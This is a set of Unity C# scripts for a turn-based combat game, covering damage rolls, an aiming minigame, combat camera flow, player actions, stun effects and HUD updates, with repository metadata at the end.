    /// direct child of <paramref name="parent"/> whose tag matches, or null.
    /// Only direct children are inspected — no deep search.
    /// </summary>
    public static T FindComponentInChildWithTag<T>(this GameObject parent, string tag) where T : Component
    {
        foreach (Transform child in parent.transform)
        {
            if (child.tag == tag)
            {
                return child.GetComponent<T>();
            }
        }
        return null;
    }

    /// Appends any number of elements to the list in a single call.
    public static void AddMany<T>(this List<T> list, params T[] elements)
    {
        list.AddRange(elements);
    }

    /// True when the two RectTransforms' world-space rects overlap.
    public static bool RectOverlaps(this RectTransform a, RectTransform b)
    {
        return a.WorldRect().Overlaps(b.WorldRect());
    }

    /// Overlap test variant that can treat inverted rects as valid.
    public static bool RectOverlaps(this RectTransform a, RectTransform b, bool allowInverse)
    {
        return a.WorldRect().Overlaps(b.WorldRect(), allowInverse);
    }

    /// <summary>
    /// World-space rect centred on the transform's position, scaled by
    /// lossyScale. NOTE(review): uses sizeDelta, which equals the visual size
    /// only for non-anchor-stretched rects — confirm callers never pass
    /// stretched RectTransforms.
    /// </summary>
    public static Rect WorldRect(this RectTransform rectTransform)
    {
        Vector2 size = rectTransform.sizeDelta;
        float worldWidth = size.x * rectTransform.lossyScale.x;
        float worldHeight = size.y * rectTransform.lossyScale.y;
        Vector3 center = rectTransform.position;
        return new Rect(center.x - worldWidth / 2f, center.y - worldHeight / 2f, worldWidth, worldHeight);
    }
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
using UnityEngine.UI;
using DG.Tweening;
/// <summary>
/// Resolves attack outcomes (hit/miss/graze/block) for both sides and applies
/// damage to the player and enemy health pools, keeping the HUD health bars
/// and counters in sync.
/// </summary>
public class DamageCalculator : MonoBehaviour
{
    // Result of the most recently resolved attack.
    public enum CombatOutcome
    {
        Hit,
        Missed,
        Grazed,
        Critical,
        Blocked
    }
    public CombatOutcome combatOutcome;
    [SerializeField] TextMeshProUGUI enemyDamage;
    [SerializeField] TextMeshProUGUI playerDamage;
    [SerializeField] TextMeshProUGUI enemyHealthCounter;
    [SerializeField] TextMeshProUGUI playerHealthCounter;
    [SerializeField] Image playerHealthBar;
    [SerializeField] Image enemyHealthBar;

    private float missRoll;       // last 0..1 roll; higher than hit chance = miss
    public int damageDealt;       // damage applied by the last resolved attack
    private float finalHitChance; // hit chance after defend-state modifiers
    public int maxHealth_Player;
    public int currentHealth_Player;
    public int maxHealth_Enemy;
    public int currentHealth_Enemy;

    public static DamageCalculator instance;

    private void Awake()
    {
        instance = this;
    }

    private void Start()
    {
        // Both combatants start at full health.
        currentHealth_Player = maxHealth_Player;
        currentHealth_Enemy = maxHealth_Enemy;
        UpdatePlayerHealth();
        UpdateEnemyHealth();
    }

    //////////////////////////////////////////////////////////////
    /// ENEMY ATTACKING PLAYER //////////////////////////////////
    //////////////////////////////////////////////////////////////
    public void DeterminePlayerFate(int damage, EnemyAction enemyAction) // Called by EnemyController
    {
        // Determine Combat Outcome
        CheckPlayerFate(enemyAction.baseHitChance);
        // Calculate Damage
        CalculateDamageToPlayer(damage);
        // Apply Status Effect
        PlayerStatusEffect.instance.ApplyStatusEffect();
    }

    /// Rolls against the enemy's hit chance, modified by the player's
    /// current defend state (dodge penalty, block, quickstep auto-miss).
    private void CheckPlayerFate(float hitChance)
    {
        // Roll for Miss/Hit
        missRoll = Random.Range(0, 1f);
        switch (PlayerController.instance.defendState)
        {
            case PlayerController.DefendState.Dodging:
                // Dodging lowers the hit chance; a "hit" while dodging is only a graze.
                finalHitChance = Mathf.Clamp(hitChance - PlayerController.instance.hitPenalty_Dodge, 0, 1);
                if (missRoll > finalHitChance)
                {
                    combatOutcome = CombatOutcome.Missed;
                }
                else
                {
                    combatOutcome = CombatOutcome.Grazed;
                }
                break;
            case PlayerController.DefendState.Blocking:
                combatOutcome = CombatOutcome.Blocked;
                break;
            case PlayerController.DefendState.Quickstepping:
                combatOutcome = CombatOutcome.Missed; // quickstep always evades
                break;
            case PlayerController.DefendState.None:
                finalHitChance = hitChance;
                if (missRoll > finalHitChance)
                {
                    combatOutcome = CombatOutcome.Missed;
                }
                else
                {
                    combatOutcome = CombatOutcome.Hit;
                }
                break;
        }
        // NOTE(review): on the Blocking/Quickstepping paths finalHitChance is
        // not reassigned, so this log can show a stale value — confirm intent.
        Debug.Log("ROLL:" + missRoll);
        Debug.Log("MISS IF HIGHER THAN: " + finalHitChance + "(" + hitChance + " - " + PlayerController.instance.hitPenalty_Dodge + ")");
    }

    private void CalculateDamageToPlayer(int effectiveDamage)
    {
        switch (combatOutcome)
        {
            case CombatOutcome.Missed:
                break; // no damage on a clean miss
            case CombatOutcome.Grazed:
                // Scale damage by how close the roll was to connecting (min 1).
                damageDealt = Mathf.Clamp(Mathf.RoundToInt(effectiveDamage * (finalHitChance - missRoll) / finalHitChance), 1, effectiveDamage);
                PlayerTakeDamage(damageDealt);
                break;
            case CombatOutcome.Blocked:
                // Blocking absorbs a flat amount, never below 1 damage.
                damageDealt = Mathf.Clamp(effectiveDamage - PlayerController.instance.baseBlockDamage, 1, effectiveDamage);
                PlayerTakeDamage(damageDealt);
                break;
            case CombatOutcome.Hit:
                damageDealt = effectiveDamage;
                PlayerTakeDamage(damageDealt);
                break;
        }
    }

    /// Refreshes the player health bar fill and "current/max" counter text.
    public void UpdatePlayerHealth()
    {
        playerHealthBar.fillAmount = (float)currentHealth_Player / (float)maxHealth_Player;
        playerHealthCounter.text = currentHealth_Player.ToString() + "/" + maxHealth_Player.ToString();
    }

    public void PlayerTakeDamage(int dmg)
    {
        currentHealth_Player = Mathf.Clamp(currentHealth_Player - dmg, 0, maxHealth_Player);
        UpdatePlayerHealth();
    }

    //////////////////////////////////////////////////////////////
    /// PLAYER ATTACKING ENEMY //////////////////////////////////
    //////////////////////////////////////////////////////////////
    public void DetermineEnemyFate(int damage, float hitChance) // Called by PlayerController
    {
        CheckEnemyFate(hitChance);
        CalculateDamageToEnemy(damage);
        // Apply Status Effect
        EnemyStatusEffect.instance.ApplyStatusEffect();
    }

    private void CheckEnemyFate(float hitChance)
    {
        // Determine Hit or Missed (enemies have no dodge/block states).
        missRoll = Random.Range(0, 1f);
        if (missRoll > hitChance)
        {
            combatOutcome = CombatOutcome.Missed;
        }
        else
        {
            combatOutcome = CombatOutcome.Hit;
        }
    }

    private void CalculateDamageToEnemy(int damage)
    {
        // Update Damage Text and Enemy Health
        switch (combatOutcome)
        {
            case CombatOutcome.Missed:
                break;
            case CombatOutcome.Grazed:
                break;
            case CombatOutcome.Hit:
                damageDealt = damage;
                EnemyTakeDamage(damageDealt);
                break;
        }
    }

    public void EnemyTakeDamage(int dmg)
    {
        // FIX: use the dmg parameter instead of re-reading the damageDealt
        // field. The parameter was previously ignored, so external callers
        // passing an explicit amount would silently apply the wrong damage.
        // (Matches PlayerTakeDamage; behavior is unchanged for the internal
        // call site, which passes damageDealt.)
        currentHealth_Enemy = Mathf.Clamp(currentHealth_Enemy - dmg, 0, maxHealth_Enemy);
        UpdateEnemyHealth();
    }

    /// Refreshes the enemy health bar fill and "current/max" counter text.
    public void UpdateEnemyHealth()
    {
        enemyHealthBar.fillAmount = (float)currentHealth_Enemy / (float)maxHealth_Enemy;
        enemyHealthCounter.text = currentHealth_Enemy.ToString() + "/" + maxHealth_Enemy.ToString();
    }
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DG.Tweening;
using UnityEngine.UI;
using UnityEngine.Events;
/// <summary>
/// Aiming minigame: the player rotates an origin with the arrow keys, holds Q
/// to narrow a two-line reticule, and releases Q to fire. A random angle
/// within the remaining cone is raycast; hitting the weak-spot layer sets
/// STUN on the player's current action before the action is performed.
/// </summary>
public class Aiming : MonoBehaviour
{
    [Header("Aiming")]
    public bool aimActive;
    [SerializeField] RectTransform origin;     // pivot the whole reticule rotates around
    [SerializeField] RectTransform topLine;    // upper cone boundary
    [SerializeField] RectTransform bottomLine; // lower cone boundary
    [SerializeField] float aimSpeed;           // cone-narrowing speed while Q is held
    [SerializeField] float rotateSpeed;        // origin rotation speed (arrow keys)
    [SerializeField] LayerMask layerMask;      // weak-spot layer for the hit raycast
    [SerializeField] Image iconImage;
    private Image topLineImage;
    private Image bottomLineImage;
    private Color originalColor_top;
    private Color originalColor_icon;
    private Vector3 originalAngle_origin;
    private Vector3 originalAngle_top;
    private Vector3 originalAngle_bottom;
    private bool isAiming;
    private bool flashing; // guards against stacking flash tweens
    Sequence aimSequence;
    public UnityEvent onAimingFinished;
    [Header("Weakspot")]
    [SerializeField] Image spotImage;
    [SerializeField] Color spotColor_1;
    [SerializeField] Color spotColor_2;

    public static Aiming instance;

    private void Awake()
    {
        instance = this;
    }

    private void Start()
    {
        // Cache component references and rest poses so ResetAim can restore them.
        topLineImage = topLine.GetComponent<Image>();
        bottomLineImage = bottomLine.GetComponent<Image>();
        originalColor_top = topLineImage.color;
        originalColor_icon = iconImage.color;
        originalAngle_origin = origin.eulerAngles;
        originalAngle_top = topLine.eulerAngles;
        originalAngle_bottom = bottomLine.eulerAngles;
        FlashWeakSpot(); // start the endless weak-spot pulse
    }

    /// Enables the aiming GUI and starts accepting input.
    public void TriggerAim()
    {
        aimActive = true;
        origin.gameObject.SetActive(true);
        topLine.gameObject.SetActive(true);
        bottomLine.gameObject.SetActive(true);
        iconImage.gameObject.SetActive(true);
        spotImage.gameObject.SetActive(true);
    }

    private void Update()
    {
        // Editor-only visualization of the current aim ray.
        Vector3 forward = topLine.TransformDirection(Vector3.down) * 10;
        Debug.DrawRay(origin.position, forward, Color.green);
        if (!aimActive) { return; }
        // Up/Down arrows rotate the whole reticule.
        if (Input.GetKey(KeyCode.DownArrow))
        {
            RotateOriginDown();
        }
        else if (Input.GetKey(KeyCode.UpArrow))
        {
            RotateOriginUp();
        }
        // Aim
        if (Input.GetKey(KeyCode.Q))
        {
            AimingReticule(); // hold Q: narrow the cone
        }
        if (Input.GetKeyUp(KeyCode.Q))
        {
            FinishAim(); // release Q: fire
        }
    }

    private void FinishAim()
    {
        isAiming = false;
        // NOTE(review): if Q is released before FlashAimLine ever ran,
        // aimSequence is still unset here — confirm Kill() on it is safe.
        aimSequence.Kill();
        topLineImage.color = originalColor_top;
        onAimingFinished.Invoke();
        DetectHit();
    }

    /// Picks a random angle inside the remaining cone, raycasts it against the
    /// weak-spot layer, stores the result as STUN, then performs the action.
    private void DetectHit()
    {
        float angleZ = Random.Range(topLine.eulerAngles.z, bottomLine.eulerAngles.z);
        Debug.Log(angleZ);
        // Snap both lines onto the rolled angle so the ray matches the visual.
        topLine.eulerAngles = bottomLine.eulerAngles = new Vector3(topLine.eulerAngles.x, topLine.eulerAngles.y, angleZ);
        RaycastHit hit;
        if (Physics.Raycast(origin.position, topLine.transform.TransformDirection(Vector3.down), out hit, 100f, layerMask))
        {
            PlayerController.instance.currentAction.STUN = true;
        }
        else
        {
            PlayerController.instance.currentAction.STUN = false;
        }
        spotImage.gameObject.SetActive(false);
        iconImage.gameObject.SetActive(false);
        topLine.gameObject.SetActive(false);
        bottomLine.gameObject.SetActive(false);
        PlayerController.instance.PerformAction();
    }

    private void RotateOriginUp()
    {
        origin.Rotate(new Vector3(0, 0, 1) * Time.deltaTime * rotateSpeed);
    }

    private void RotateOriginDown()
    {
        origin.Rotate(new Vector3(0, 0, -1) * Time.deltaTime * rotateSpeed);
    }

    /// Narrows the cone each frame Q is held; once the lines meet, pins them
    /// together and flashes to signal maximum accuracy.
    private void AimingReticule()
    {
        isAiming = true;
        topLine.gameObject.SetActive(true);
        bottomLine.gameObject.SetActive(true);
        if (Quaternion.Angle(topLine.rotation, bottomLine.rotation) < 1 || topLine.eulerAngles.z < bottomLine.eulerAngles.z)
        {
            topLine.eulerAngles = new Vector3(topLine.eulerAngles.x, topLine.eulerAngles.y, bottomLine.eulerAngles.z);
            FlashAimLine();
            return;
        }
        // Rotate the two lines toward each other.
        topLine.Rotate(new Vector3(0, 0, -1) * Time.deltaTime * aimSpeed);
        bottomLine.Rotate(new Vector3(0, 0, 1) * Time.deltaTime * aimSpeed);
    }

    /// Infinite blink on the top line + icon while fully converged.
    private void FlashAimLine()
    {
        if (flashing) { return; }
        flashing = true;
        topLineImage.color = Color.white;
        iconImage.color = Color.white;
        aimSequence = DOTween.Sequence();
        aimSequence
            .Append(topLineImage.DOFade(0.2f, 0.1f))
            .Append(topLineImage.DOFade(1f, 0.1f))
            .SetLoops(-1);
    }

    /// Endless two-color pulse on the weak-spot marker.
    private void FlashWeakSpot()
    {
        Sequence spotSequence = DOTween.Sequence();
        spotSequence
            .Append(spotImage.DOColor(spotColor_1, 0.3f))
            .Append(spotImage.DOColor(spotColor_2, 0.3f))
            .SetLoops(-1);
    }

    /// Restores colors, angles, and visibility to the cached rest state.
    private void ResetAim()
    {
        flashing = false;
        aimSequence.Kill();
        topLineImage.color = originalColor_top;
        iconImage.color = originalColor_icon;
        origin.eulerAngles = originalAngle_origin;
        topLine.eulerAngles = originalAngle_top;
        bottomLine.eulerAngles = originalAngle_bottom;
        iconImage.gameObject.SetActive(false);
        topLine.gameObject.SetActive(false);
        bottomLine.gameObject.SetActive(false);
        spotImage.gameObject.SetActive(false);
    }

    private void OnDisable()
    {
        ResetAim();
    }
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
using UnityEngine.Events;
/// <summary>
/// Orchestrates the combat flow when either side's slider reaches zero:
/// pauses the sliders, runs the pre-combat camera pan and action banner,
/// then plays the matching combat-animation sequence and raises lifecycle
/// events for the other systems.
/// </summary>
public class CombatManager : MonoBehaviour
{
    [SerializeField] GameObject elementsGUI;   // HUD hidden during cinematics
    [SerializeField] Animator cameraAnimator;  // drives pan/zoom camera triggers
    [SerializeField] GameObject actorSprites;  // overworld combatant sprites
    [SerializeField] GameObject recoverVFX;    // shown for wait/regain actions
    [SerializeField] float waitForActionName;  // banner display time (seconds)
    public string currentActionName;
    public int currentSequence;                // index into combatSequence
    [SerializeField] GameObject combatCanvas;
    [SerializeField] GameObject[] combatSequence;
    public bool pauseSlider;                   // read by BattleCountdown et al.
    public UnityEvent onPrecombatStart;
    public UnityEvent onPrecombatEnd;
    public UnityEvent onCombatStarted;
    public UnityEvent onCombatFinished;

    public static CombatManager instance;

    private void Awake()
    {
        instance = this;
    }

    private void Start()
    {
        // Opening the combat menu also freezes the sliders.
        CombatMenu.instance.onMenuActive.AddListener(PauseCombatSlider);
    }

    // ========== Called by PlayerController & EnemyController when sliders reach zero ================================================
    public void PlayerTriggerPrecombat(PlayerAction playerAction)
    {
        PauseCombatSlider();
        currentActionName = playerAction.actionName;
        currentSequence = playerAction.sequenceID;
        StartCoroutine(PlayerPrecombatCamera(playerAction));
        onPrecombatStart.Invoke();
    }

    public void EnemyTriggerPrecombat(EnemyAction enemyAction)
    {
        PauseCombatSlider();
        currentActionName = enemyAction.actionName;
        currentSequence = enemyAction.sequenceID;
        StartCoroutine(EnemyPrecombatCamera(enemyAction));
        onPrecombatStart.Invoke();
    }

    // ========== CAMERA MOVEMENTS ================================================================================================
    private IEnumerator PlayerPrecombatCamera(PlayerAction playerAction)
    {
        elementsGUI.SetActive(false);
        PanCameraLeft(); // focus the player's side
        // Wait actions show a recovery VFX during the banner.
        if (playerAction.actionType == PlayerAction.ActionType.ShortWait || playerAction.actionType == PlayerAction.ActionType.LongWait)
        {
            recoverVFX.SetActive(true);
        }
        yield return new WaitForSeconds(waitForActionName);
        onPrecombatEnd.Invoke();
        if (playerAction.actionType == PlayerAction.ActionType.Attack)
        {
            // Only attacks get a full combat-animation sequence.
            StartCombatCamera();
            StartCombatSequence();
        }
        else
        {
            // Non-attacks return straight to the normal view and resume.
            cameraAnimator.SetTrigger("Default");
            ResumeCombatSlider();
            elementsGUI.SetActive(true);
        }
    }

    private IEnumerator EnemyPrecombatCamera(EnemyAction enemyAction)
    {
        elementsGUI.SetActive(false);
        PanCameraRight(); // focus the enemy's side
        yield return new WaitForSeconds(waitForActionName);
        onPrecombatEnd.Invoke();
        // Enemy actions always run their combat sequence.
        StartCombatCamera();
        StartCombatSequence();
    }

    public void StartCombatCamera()
    {
        cameraAnimator.SetTrigger("Zoom");
        actorSprites.SetActive(false); // sequences render their own sprites
    }

    public void PanCameraLeft()
    {
        cameraAnimator.SetTrigger("PanLeft");
    }

    public void PanCameraRight()
    {
        cameraAnimator.SetTrigger("PanRight");
    }

    // ========== COMBAT SPRITES ================================================================================================
    public void PauseCombatSlider()
    {
        pauseSlider = true;
    }

    public void ResumeCombatSlider()
    {
        pauseSlider = false;
    }

    public void StartCombatSequence()
    {
        combatSequence[currentSequence].SetActive(true);
        onCombatStarted.Invoke();
    }

    public void EndCombatSequence() // Called by Individual CombatSequence
    {
        ResumeCombatSlider();
        // Deactivate every sequence so the next action starts clean.
        foreach (GameObject sequence in combatSequence)
        {
            sequence.SetActive(false);
        }
        onCombatFinished.Invoke();
    }

    // ========== REVEAL - Called by Animator ================================================================================================
    public void RevealActors()
    {
        elementsGUI.SetActive(true);
        actorSprites.SetActive(true);
    }
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
using DG.Tweening;
using UnityEngine.UI;
public class ActionName : MonoBehaviour
{
[SerializeField] Image smudge;
private Material smudgeMat;
[SerializeField] TextMeshProUGUI nameText;
// Start is called before the first frame update
private void Awake()
{
smudgeMat = smudge.material;
}
private void OnEnable()
{
RevealActionName();
}
private void RevealActionName()
{
nameText.color = new Color(nameText.color.r, nameText.color.g, nameText.color.b, 0);
smudgeMat.SetFloat("_FadeAmount", 0.4f);
smudgeMat.DOFloat(0f, "_FadeAmount", 0.5f);
nameText.DOFade(1f, 0.5f);
//Sequence mySequence = DOTween.Sequence();
//mySequence.Append(smudgeMat.DOFloat(0f, "_FadeAmount", 0.25f));
//mySequence.Append(nameText.DOFade(1f, 0.25f));
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Weakspot : MonoBehaviour
{
[SerializeField] float speed = 1f;
[SerializeField] float moveDistance = 5f;
[SerializeField] float wait = 1f;
private Vector3 newPos;
private void OnEnable()
{
StartCoroutine(SetNewPosition());
}
private void Update()
{
transform.localPosition = Vector3.Lerp(transform.localPosition, newPos, Time.deltaTime * speed);
}
private IEnumerator SetNewPosition()
{
while (true)
{
float randomX = Random.Range(transform.localPosition.x - moveDistance, transform.localPosition.x + moveDistance);
float randomY = Random.Range(transform.localPosition.y - moveDistance, transform.localPosition.y + moveDistance);
newPos = new Vector3(randomX, randomY, transform.localPosition.z);
yield return new WaitForSeconds(1f);
}
}
private void OnDisable()
{
StopAllCoroutines();
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
using TMPro;
using UnityEngine.Events;
public class PlayerController : MonoBehaviour
{
public enum DefendState
{
None,
Dodging,
Blocking,
Quickstepping,
Waiting
}
public DefendState defendState;
[Header("Events")]
public UnityEvent onActionChosen;
public UnityEvent onActionReady;
public PlayerAction currentAction;
[Header("Slider")]
public Slider combatSlider;
public float sliderInterval;
[SerializeField] float sliderSpeed;
[SerializeField] GameObject sliderHandle;
[SerializeField] TextMeshProUGUI counterText;
[Header("Speed")]
public float effectiveSpeed;
public float speedModifier = 1f;
[Header("Dodge")]
public float baseHitPenalty_Dodge;
public float hitPenalty_Dodge;
[Header("Block")]
public int baseBlockDamage;
[Header("Wait")]
public float longWaitFactor = 0.002f;
public float longWaitConst = 0.75f;
public float maxLongWait = 100;
public float minlongWait = 25;
public static PlayerController instance;
private void Awake()
{
instance = this;
}
void Start()
{
CombatManager.instance.onCombatFinished.AddListener(ResetDefendState);
}
// ==================== Called by CombatButton when Select ========================================================
public void SetCurrentAction(PlayerAction playerAction)
{
currentAction = playerAction;
}
// ==================== Called by CombatButton when Confirm ========================================================
public void ChooseCombatAction(PlayerAction playerAction)
{
CombatManager.instance.ResumeCombatSlider();
if (playerAction.actionType == PlayerAction.ActionType.Quickstep)
{
Quickstep.instance.SpawnArrows();
}
else if (playerAction.useAmmo)
{
Aiming.instance.TriggerAim();
}
else
{
if (playerAction.baseSpeed > 0)
{
StartCoroutine(ActivateCombatSlider());
CombatHUD.instance.DisplaySliderHandle();
CombatMenu.instance.actionQueued = true;
}
}
onActionChosen.Invoke();
}
// ==================== Slider Behavior ========================================================
private IEnumerator ActivateCombatSlider()
{
combatSlider.value = effectiveSpeed;
counterText.text = Mathf.FloorToInt(combatSlider.value).ToString();
RallyRing.instance.ChanceForRallyRing();
while (combatSlider.value >= 0)
{
if (CombatMenu.instance.isMenuActive) { yield return null; }
else if (CombatManager.instance.pauseSlider || RallyRing.instance.isRallyActive)
{
yield return null;
}
else
{
combatSlider.value = Mathf.Clamp(combatSlider.value - sliderSpeed, 0, 100);
counterText.text = Mathf.FloorToInt(combatSlider.value).ToString();
if (combatSlider.value == 0)
{
PerformAction();
//currentAction = null;
CombatMenu.instance.actionQueued = false;
yield break;
}
yield return new WaitForSeconds(sliderInterval);
}
}
}
// ==================== When slider reaches zero ========================================================
public void PerformAction()
{
onActionReady.Invoke();
switch (currentAction.actionType)
{
case PlayerAction.ActionType.Dodge:
defendState = DefendState.Dodging;
CalculateDodgeChance();
break;
case PlayerAction.ActionType.Block:
defendState = DefendState.Blocking;
break;
case PlayerAction.ActionType.ShortWait:
defendState = DefendState.Waiting;
CombatManager.instance.PlayerTriggerPrecombat(currentAction);
Sanity.instance.RegainSanity();
break;
case PlayerAction.ActionType.LongWait:
defendState = DefendState.Waiting;
CombatManager.instance.PlayerTriggerPrecombat(currentAction);
Sanity.instance.RegainSanity();
break;
case PlayerAction.ActionType.Attack:
CombatManager.instance.PlayerTriggerPrecombat(currentAction);
DamageCalculator.instance.DetermineEnemyFate(currentAction.baseDamage, currentAction.baseHitChance);
break;
}
}
// ==================== Other Calculations ========================================================
public void ResetDefendState()
{
defendState = DefendState.None;
}
private void CalculateDodgeChance()
{
hitPenalty_Dodge = baseHitPenalty_Dodge + EnemyController.instance.combatSlider.value / 100;
}
public void CalculateEffectiveSpeed()
{
if (currentAction.actionType == PlayerAction.ActionType.LongWait)
{
CalculateLongWaitSpeed();
}
else
{
effectiveSpeed = currentAction.baseSpeed * speedModifier;
}
}
public void CalculateLongWaitSpeed()
{
float waitSpeed = Mathf.Pow(Sanity.instance.sanityCounter, 2f) / Mathf.Pow(longWaitConst, 2f) * longWaitFactor;
effectiveSpeed = Mathf.RoundToInt(Mathf.Clamp(waitSpeed, minlongWait, maxLongWait));
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
[CreateAssetMenu(menuName = "Enemy Action")]
public class EnemyAction : ScriptableObject
{
[Header("Attributes")]
public string actionName;
public int minDamage;
public int maxDamage;
public int minSpeed;
public int maxSpeed;
public int sequenceID;
public float baseHitChance;
public float cooldown;
[Header("BLEED")]
public bool BLEED;
[Header("BLEED")]
public bool POISON;
public int POISON_Counter;
public int POISON_damagePerTick;
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
public class EnemyStatusEffect : MonoBehaviour
{
[Header("Stun")]
public bool isStun;
public int stun_Counter;
[SerializeField] TextMeshProUGUI stunText;
public static EnemyStatusEffect instance;
private void Awake()
{
instance = this;
}
public void ApplyStatusEffect()
{
switch (DamageCalculator.instance.combatOutcome)
{
case DamageCalculator.CombatOutcome.Missed:
break;
default:
if (PlayerController.instance.currentAction.STUN)
{
InflictSTUN();
}
break;
}
}
//========= STUN ===============================================================================================================================
public void InflictSTUN()
{
if (isStun) { return; }
isStun = true;
stun_Counter += PlayerController.instance.currentAction.STUN_Counter;
stunText.text = stun_Counter.ToString();
stunText.transform.parent.gameObject.SetActive(true);
StartCoroutine(STUNCoroutine());
}
private IEnumerator STUNCoroutine()
{
while (true)
{
yield return StartCoroutine(BattleCountdown(1f));
stun_Counter--;
stunText.text = stun_Counter.ToString();
if (stun_Counter == 0)
{
stunText.transform.parent.gameObject.SetActive(false);
isStun = false;
yield break;
}
}
}
//=========== HELPER =============================================================================================================================
public static IEnumerator BattleCountdown(float duration)
{
float timer = 0;
while (true)
{
if (CombatMenu.instance.isMenuActive || CombatManager.instance.pauseSlider || RallyRing.instance.isRallyActive)
{
yield return null;
}
else
{
timer += Time.deltaTime;
if (timer >= duration)
{
yield break;
}
}
yield return null;
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DG.Tweening;
using TMPro;
public class DamageCounter : MonoBehaviour
{
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
using TMPro;
using DG.Tweening;
public class CombatHUD : MonoBehaviour
{
[Header("Action Name")]
[SerializeField] TextMeshProUGUI actionText;
[Header("Damage Text")]
[SerializeField] GameObject combatCanvas;
[SerializeField] TextMeshProUGUI enemyDamage;
[SerializeField] TextMeshProUGUI playerDamage;
private float enemy_originY;
private float player_originY;
[Header("Player Slider")]
[SerializeField] Slider previewSlider;
[SerializeField] GameObject sliderHandle;
[SerializeField] TextMeshProUGUI counterText;
public TextMeshProUGUI queueText_Player;
public TextMeshProUGUI queueText_Enemy;
public static CombatHUD instance;
private void Awake()
{
instance = this;
}
private void Start()
{
player_originY = playerDamage.rectTransform.anchoredPosition.y;
enemy_originY = enemyDamage.rectTransform.anchoredPosition.y;
CombatManager.instance.onPrecombatStart.AddListener(DisplayActionName);
CombatManager.instance.onPrecombatEnd.AddListener(HideActionName);
CombatManager.instance.onCombatStarted.AddListener(EnableCombatCanvas);
CombatManager.instance.onCombatFinished.AddListener(DisableCombatCanvas);
PlayerController.instance.onActionChosen.AddListener(DisplayPlayerQueueText);
PlayerController.instance.onActionReady.AddListener(HidePlayerQueueText);
PlayerController.instance.onActionReady.AddListener(HideSliderHandle);
EnemyController.instance.onActionChosen.AddListener(DisplayEnemyQueueText);
EnemyController.instance.onActionReady.AddListener(HideEnemyQueueText);
sliderHandle.SetActive(false);
}
// ================================== ACTION NAME ================================================================
public void DisplayActionName()
{
actionText.transform.parent.gameObject.SetActive(true);
actionText.text = CombatManager.instance.currentActionName;
}
public void HideActionName()
{
actionText.text = null;
actionText.transform.parent.gameObject.SetActive(false);
}
// ================================== DAMAGE TEXT ================================================================
public void EnableCombatCanvas()
{
combatCanvas.SetActive(true);
}
public void DisableCombatCanvas()
{
combatCanvas.SetActive(false);
}
public void DisplayEnemyDamage() // Called by Combat Sprites
{
switch (DamageCalculator.instance.combatOutcome)
{
case DamageCalculator.CombatOutcome.Missed:
enemyDamage.text = "MISSED";
enemyDamage.color = Color.white;
enemyDamage.fontSize = 50;
break;
//case DamageCalculator.CombatOutcome.Grazed:
// enemyDamage.text = "GRAZED\n" + DamageCalculator.instance.damageDealt.ToString();
// enemyDamage.color = Color.red;
// enemyDamage.fontSize = 50;
// break;
default:
if (PlayerController.instance.currentAction.STUN && EnemyController.instance.combatSlider.value > 0)
{
EnemyController.instance.combatSlider.value = 0;
enemyDamage.text = "<size=50>STUNNED</size>\n" + DamageCalculator.instance.damageDealt.ToString();
enemyDamage.color = Color.red;
enemyDamage.fontSize = 100;
}
else
{
enemyDamage.text = DamageCalculator.instance.damageDealt.ToString();
enemyDamage.color = Color.red;
enemyDamage.fontSize = 100;
}
break;
}
enemyDamage.rectTransform.anchoredPosition = new Vector3(enemyDamage.rectTransform.anchoredPosition.x, enemy_originY);
enemyDamage.rectTransform.DOAnchorPosY(enemy_originY + 150f, 1.2f);
enemyDamage.DOFade(0f, 1.2f);
}
public void DisplayPlayerDamage() // Called by Combat Sprites
{
switch (DamageCalculator.instance.combatOutcome)
{
case DamageCalculator.CombatOutcome.Missed:
playerDamage.text = "MISSED";
playerDamage.color = Color.white;
playerDamage.fontSize = 50;
break;
case DamageCalculator.CombatOutcome.Grazed:
playerDamage.text = "GRAZED\n" + DamageCalculator.instance.damageDealt.ToString();
playerDamage.color = Color.red;
playerDamage.fontSize = 50;
break;
default:
playerDamage.text = DamageCalculator.instance.damageDealt.ToString();
playerDamage.color = Color.red;
playerDamage.fontSize = 100;
break;
}
//playerDamage.color = new Color(playerDamage.color.r, playerDamage.color.g, playerDamage.color.b, 255);
playerDamage.rectTransform.anchoredPosition = new Vector3(playerDamage.rectTransform.anchoredPosition.x, player_originY);
playerDamage.rectTransform.DOAnchorPosY(player_originY + 150f, 1.2f);
playerDamage.DOFade(0f, 1.2f);
}
// ================================== QUEUE TEXT & SLIDER HANDLE ================================================================
public void DisplayPlayerQueueText()
{
queueText_Player.text = PlayerController.instance.currentAction.actionName;
HidePreviewSlider();
}
public void HidePlayerQueueText()
{
queueText_Player.text = null;
}
public void DisplaySliderHandle()
{
sliderHandle.SetActive(true);
}
public void HideSliderHandle()
{
sliderHandle.SetActive(false);
}
public void DisplayEnemyQueueText()
{
queueText_Enemy.text = EnemyController.instance.currentAction.actionName;
}
public void HideEnemyQueueText()
{
queueText_Player.text = null;
}
// ================================== PREVIEW SLIDER ================================================================
public void ShowPreviewSlider() // Called by CombatButton
{
previewSlider.gameObject.SetActive(true);
previewSlider.value = PlayerController.instance.effectiveSpeed;
counterText.text = previewSlider.value.ToString();
// TESTING DODGE CALCULATION
//float previewPenalty = baseHitPenalty_Dodge + (EnemyController.instance.combatSlider.value - effectiveSpeed) / 100;
//dodgePenaltyText.text = previewPenalty.ToString();
}
public void HidePreviewSlider()
{
previewSlider.value = 0;
counterText.text = null;
previewSlider.gameObject.SetActive(false);
}
}
| 17f9084347384e71673f4b4778d113fa4a3b842a | [
"C#",
"Text"
] | 23 | C# | pictagor/Project-Quietus | e608e8fdb6880c9e73bd023530942262680e06e2 | 85828da7a0d5effc1d2227477e9ac7fa3110b4d0 |
refs/heads/main | <repo_name>Ryan-Walsh-6/ICS3U-Unit3-02-CPP<file_sep>/guessing_game.cpp
